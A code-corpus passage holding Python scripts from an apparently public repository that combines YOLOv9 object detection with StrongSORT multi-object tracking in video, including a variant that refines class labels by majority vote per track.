if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print results
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms strong sort update per image at shape {(1, 3, imgsz, imgsz)}' % t)
if save_txt or save_vid:
s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov7.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--show-vid', action='store_true', help='display tracking video results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--save-vid', action='store_true', help='save video tracking results')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
# class 0 is person, 1 is bycicle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--hide-class', default=False, action='store_true', help='hide IDs')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 21,579 | Python | .py | 396 | 43.714646 | 154 | 0.588552 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,105 | Refinement_trackv9.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/Refinement_trackv9.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import platform
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov9') not in sys.path:
sys.path.append(str(ROOT / 'yolov9')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from yolov9.models.experimental import attempt_load
from yolov9.models.common import DetectMultiBackend
from yolov9.utils.dataloaders import LoadImages, LoadStreams, LoadScreenshots
from yolov9.utils.general import (LOGGER, Profile, check_file, check_img_size, check_imshow, check_requirements, colorstr, cv2,
increment_path, non_max_suppression, print_args, scale_boxes, strip_optimizer, xyxy2xywh)
from yolov9.utils.torch_utils import select_device, time_sync, smart_inference_mode
from yolov9.utils.plots import Annotator, colors, save_one_box
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def track_and_refine_classes(outputs, threshold):
refined_labels = {}
# output is a list of detection tuples, where each tuple contains the following elements:
# (x_min, y_min, x_max, y_max, track_id, class_label,confidence)
track_ids = []
tracklets = {}
# Create a dictionary of tracklets
for detection in outputs:
track_id = detection[4]
if track_id not in tracklets:
tracklets[track_id] = []
tracklets[track_id].append(detection)
track_ids.append(track_id)
# Remove duplicate track ids
track_ids = list(set(track_ids))
# Refine class labels for each tracklet
for track_id in track_ids:
tracklet = tracklets[track_id]
class_counts = {}
total_detections = len(tracklet)
for detection in tracklet:
class_label = detection[5]
if class_label not in class_counts:
class_counts[class_label] = 0
class_counts[class_label] += 1
# Determine the majority class and refine labels if necessary
if class_counts:
majority_class = max(class_counts, key=class_counts.get)
majority_frequency = class_counts[majority_class] / total_detections
if majority_frequency >= threshold:
for detection in tracklet:
refined_labels[track_id] = majority_class
return refined_labels
@smart_inference_mode()
def run(
source='0',
data = ROOT / 'data/coco.yaml', # data.yaml path
yolo_weights=WEIGHTS / 'yolo.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
view_img=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
vid_stride=1, # video frame-rate stride
refinement_enabled=True, # flag to enable or disable refinement
refinement_threshold=0.5, # threshold for refining class labels
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
screenshot = source.lower().startswith('screen')
if is_url and is_file:
source = check_file(source) # download
# Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
device = select_device(device)
model = DetectMultiBackend(yolo_weights, device=device, dnn=dnn, data=data, fp16=half)
stride, names, pt = model.stride, model.names, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
# Dataloader
# Dataloader
bs = 1 # batch_size
if webcam:
view_img = check_imshow(warn=True)
dataset = LoadStreams(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
bs = len(dataset)
elif screenshot:
dataset = LoadScreenshots(source, img_size=imgsz, stride=stride, auto=pt)
else:
dataset = LoadImages(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
vid_path, vid_writer,txt_path = [None] * bs, [None] * bs, [None] * bs
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(bs):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * bs
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
model.warmup(imgsz=(1 if pt or model.triton else bs, 3, *imgsz)) # warmup
seen, windows, dt,sdt = 0, [], (Profile(), Profile(), Profile(), Profile()),[0.0, 0.0, 0.0, 0.0]
curr_frames, prev_frames = [None] * bs, [None] * bs
for frame_idx, (path, im, im0s, vid_cap, s) in enumerate(dataset):
# s = ''
t1 = time_sync()
with dt[0]:
im = torch.from_numpy(im).to(model.device)
im = im.half() if model.fp16 else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
sdt[0] += t2 - t1
# Inference
with dt[1]:
visualize = increment_path(save_dir / Path(path).stem, mkdir=True) if visualize else False
pred = model(im, augment=augment, visualize=visualize)
pred = pred[0][1]
t3 = time_sync()
sdt[1] += t3 - t2
# Apply NMS
with dt[2]:
pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det)
sdt[2] += time_sync() - t3
# Second-stage classifier (optional)
# pred = utils.general.apply_classifier(pred, classifier_model, im, im0s)
# Process detections
for i, det in enumerate(pred): # detections per image
seen += 1
if webcam: # bs >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
# txt_file_name = p.name
txt_file_name = p.stem + f'_{i}' # Unique text file name
# save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
save_path = str(save_dir / p.stem) + f'_{i}' # Unique video file name
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.parent.name # get folder name containing current img
save_path = str(save_dir / p.parent.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh
imc = im0.copy() if save_crop else im0 # for save_crop
annotator = Annotator(im0, line_width=line_thickness, example=str(names))
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
det[:, :4] = scale_boxes(im.shape[2:], det[:, :4], im0.shape).round()
# Print results
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum() # detections per class
s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = xyxy2xywh(det[:, 0:4])
confs = det[:, 4]
clss = det[:, 5]
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
sdt[3] += t5 - t4
if refinement_enabled:
refined_labels = track_and_refine_classes( outputs[i], refinement_threshold)
# Write results
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
xyxy = output[0:4]
id = output[4]
cls = output[5]
# update class label if refinement is enabled
if refinement_enabled:
if id in refined_labels:
rcls = refined_labels[id]
# for *xyxy, conf, cls in reversed(det):
if save_txt: # Write to file
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
# line = (id , cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
line = ( int(p.stem), frame_idx, id , rcls, *xywh, conf) if save_conf else ( p.stem, frame_idx, cls, *xywh) # label format
with open(txt_path + '.txt', 'a') as file:
file.write(('%g ' * len(line) + '\n') % line)
if save_img or save_crop or view_img: # Add bbox to image
c = int(rcls) # integer class
label = None if hide_labels else (names[c] if hide_conf else f' { id } {names[c]} {conf:.2f}')
plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=2)
if save_crop:
save_one_box(xyxy, imc, file=save_dir / 'crops' / names[c] / f'{p.stem}.jpg', BGR=True)
# # draw boxes for visualization
# if len(outputs[i]) > 0:
# for j, (output, conf) in enumerate(zip(outputs[i], confs)):
# bboxes = output[0:4]
# id = output[4]
# cls = output[5]
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_img or save_crop or view_img: # Add bbox to image
# c = int(cls) # integer class
# id = int(id) # integer id
# label = None if hide_labels else (names[c] if hide_conf else f'{names[c]} {conf:.2f}')
# plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
# if save_crop:
# txt_file_name = txt_file_name if (isinstance(path, list) and len(path) > 1) else ''
# save_one_box(bboxes, imc, file=save_dir / 'crops' / txt_file_name / names[c] / f'{id}' / f'{p.stem}.jpg', BGR=True)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
im0 = annotator.result()
if view_img:
if platform.system() == 'Linux' and p not in windows:
windows.append(p)
cv2.namedWindow(str(p), cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux)
cv2.resizeWindow(str(p), im0.shape[1], im0.shape[0])
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print time (inference-only)
LOGGER.info(f"{s}{'' if len(det) else '(no detections), '}{dt[1].dt * 1E3:.1f}ms")
# Print results
LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape, %.1fms StrongSORT' % tuple(1E3 * x / seen for x in sdt))
if save_txt or save_img:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights[0]) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov9.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='(optional) dataset.yaml path')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true', help='show results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
# class 0 is person, 1 is bycicle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--vid-stride', type=int, default=1, help='video frame-rate stride')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
# check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 21,536 | Python | .py | 377 | 45.986737 | 150 | 0.581695 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,106 | trackv9.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/trackv9.py | import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import platform
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov9') not in sys.path:
sys.path.append(str(ROOT / 'yolov9')) # add yolov5 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from yolov9.models.experimental import attempt_load
from yolov9.models.common import DetectMultiBackend
from yolov9.utils.dataloaders import LoadImages, LoadStreams, LoadScreenshots
from yolov9.utils.general import (LOGGER, Profile, check_file, check_img_size, check_imshow, check_requirements, colorstr, cv2,
increment_path, non_max_suppression, print_args, scale_boxes, strip_optimizer, xyxy2xywh)
from yolov9.utils.torch_utils import select_device, time_sync, smart_inference_mode
from yolov9.utils.plots import Annotator, colors, save_one_box
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
@smart_inference_mode()
def run(
source='0',
data = ROOT / 'data/coco.yaml', # data.yaml path
yolo_weights=WEIGHTS / 'yolo.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
view_img=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
vid_stride=1, # video frame-rate stride
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
screenshot = source.lower().startswith('screen')
if is_url and is_file:
source = check_file(source) # download
# Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
device = select_device(device)
model = DetectMultiBackend(yolo_weights, device=device, dnn=dnn, data=data, fp16=half)
stride, names, pt = model.stride, model.names, model.pt
imgsz = check_img_size(imgsz, s=stride) # check image size
# Dataloader
# Dataloader
bs = 1 # batch_size
if webcam:
view_img = check_imshow(warn=True)
dataset = LoadStreams(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
bs = len(dataset)
elif screenshot:
dataset = LoadScreenshots(source, img_size=imgsz, stride=stride, auto=pt)
else:
dataset = LoadImages(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride)
vid_path, vid_writer,txt_path = [None] * bs, [None] * bs, [None] * bs
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(bs):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * bs
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
# Run tracking
model.warmup(imgsz=(1 if pt or model.triton else bs, 3, *imgsz)) # warmup
seen, windows, dt,sdt = 0, [], (Profile(), Profile(), Profile(), Profile()),[0.0, 0.0, 0.0, 0.0]
curr_frames, prev_frames = [None] * bs, [None] * bs
for frame_idx, (path, im, im0s, vid_cap, s) in enumerate(dataset):
# s = ''
t1 = time_sync()
with dt[0]:
im = torch.from_numpy(im).to(model.device)
im = im.half() if model.fp16 else im.float() # uint8 to fp16/32
im /= 255 # 0 - 255 to 0.0 - 1.0
if len(im.shape) == 3:
im = im[None] # expand for batch dim
t2 = time_sync()
sdt[0] += t2 - t1
# Inference
with dt[1]:
visualize = increment_path(save_dir / Path(path).stem, mkdir=True) if visualize else False
pred = model(im, augment=augment, visualize=visualize)
pred = pred[0]
t3 = time_sync()
sdt[1] += t3 - t2
# Apply NMS
with dt[2]:
pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det)
sdt[2] += time_sync() - t3
# Second-stage classifier (optional)
# pred = utils.general.apply_classifier(pred, classifier_model, im, im0s)
# Process detections
for i, det in enumerate(pred): # detections per image
seen += 1
if webcam: # bs >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
# txt_file_name = p.name
txt_file_name = p.stem + f'_{i}' # Unique text file name
# save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
save_path = str(save_dir / p.stem) + f'_{i}' # Unique video file name
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.parent.name # get folder name containing current img
save_path = str(save_dir / p.parent.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
s += '%gx%g ' % im.shape[2:] # print string
gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh
imc = im0.copy() if save_crop else im0 # for save_crop
annotator = Annotator(im0, line_width=line_thickness, example=str(names))
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
det[:, :4] = scale_boxes(im.shape[2:], det[:, :4], im0.shape).round()
# Print results
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum() # detections per class
s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = xyxy2xywh(det[:, 0:4])
confs = det[:, 4]
clss = det[:, 5]
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
sdt[3] += t5 - t4
# Write results
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
xyxy = output[0:4]
id = output[4]
cls = output[5]
# for *xyxy, conf, cls in reversed(det):
if save_txt: # Write to file
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
# line = (id , cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
